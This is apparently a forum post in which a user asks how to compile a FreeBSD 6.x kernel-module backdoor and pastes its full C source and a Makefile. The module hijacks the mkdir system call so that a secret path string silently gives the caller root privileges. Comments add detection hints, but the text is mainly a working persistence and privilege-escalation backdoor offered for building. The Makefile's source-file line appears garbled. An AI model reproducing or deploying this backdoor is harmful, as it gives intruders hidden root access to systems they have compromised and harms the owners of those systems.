KLD backdoor for 6.x

handsomeboy

I found good papers on KLD writing from THC and Phrack, but they are too old and cannot be compiled on the FreeBSD 6 or 7 branches. I found this module ... but how do I compile it correctly?


The simple kernel module d0r

######################################################################
####################### FreeBSD 6.series like kld d0r#################
####################### payhash ([email protected]) #################
####################### DarkEagle #################
####################### KAKA #################
######################################################################
########################The r00t d0r##################################
#include <sys/types.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/sysent.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/linker.h>
#include <sys/sysproto.h>
#include <sys/sysent.h>
#include <sys/proc.h>
#include <sys/syscall.h>
#include <pthread.h>

#define KEYWORD "k@k@"

/*
 * Replacement handler that t00r_handler installs over sysent[SYS_mkdir].
 *
 * Copies up to 16 bytes of the caller-supplied path into a kernel buffer
 * and, when it equals KEYWORD, zeroes the calling thread's effective,
 * saved and real uid in place and returns 0 without ever reaching the
 * real mkdir; any other path is forwarded to the stock mkdir handler.
 *
 * Defender's note: the observable symptom is a mkdir(2) call that returns
 * success although no directory is created, after which the caller's
 * credentials have changed.
 */
static int t00r_mkdir(struct thread *p, struct mkdir_args *uap)
{
unsigned char path[16];

/* Pull the user-space path into the fixed kernel buffer. */
copyin (uap->path, path, sizeof(path));

if (strcmp (path, KEYWORD) == 0)
{
// printf("detect syscall mkdir: %s\n", uap->path);

/* Credential is rewritten in place on the thread's existing ucred. */
p->td_ucred->cr_uid = 0;
p->td_ucred->cr_svuid = 0;
p->td_ucred->cr_ruid = 0;

/* Report success to the caller; the stock mkdir is not invoked. */
return (0);
}
/* Normal path: defer to the original system call. */
return mkdir(p, uap);
}

/*
 * Module event handler.
 *
 * MOD_LOAD overwrites the live mkdir(2) entry of the system-call table
 * with t00r_mkdir; MOD_UNLOAD writes the stock mkdir handler back; any
 * other event is rejected with EINVAL.
 *
 * Defender's note: sysent[] is modified in place, so a host integrity
 * check that compares sysent[].sy_call against the handlers the running
 * kernel shipped with, or auditing of kernel module load events, is
 * where this class of hook becomes visible.
 */
static int t00r_handler (struct module *module, int cmd, void *args)
{
switch (cmd)
{ case MOD_LOAD:
/* Redirect every mkdir(2) through the replacement handler. */
sysent[SYS_mkdir].sy_call = (sy_call_t *)t00r_mkdir;
break;
case MOD_UNLOAD:
/* Restore the original handler so the table is left as found. */
sysent[SYS_mkdir].sy_call = (sy_call_t*)mkdir;
break;
default:
return (EINVAL);
}
return (0);
}

/*
 * Module descriptor: the name the module registers under ("t00r"),
 * its event handler, and no private data.  Note the registered name
 * differs from the KMOD name used by the accompanying Makefile.
 */
static moduledata_t syscall_mod = {
"t00r",
t00r_handler,
NULL
};

/* Registers syscall_mod with the kernel at the SI_SUB_DRIVERS / SI_ORDER_MIDDLE init point. */
DECLARE_MODULE(syscall, syscall_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
######################################################################

############################# Makefile ###############################
SRCS = k@[email protected]
KMOD = k@k@
KO = ${KMOD}.ko
KLDMOD = t

.include <bsd.kmod.mk>
######################################################################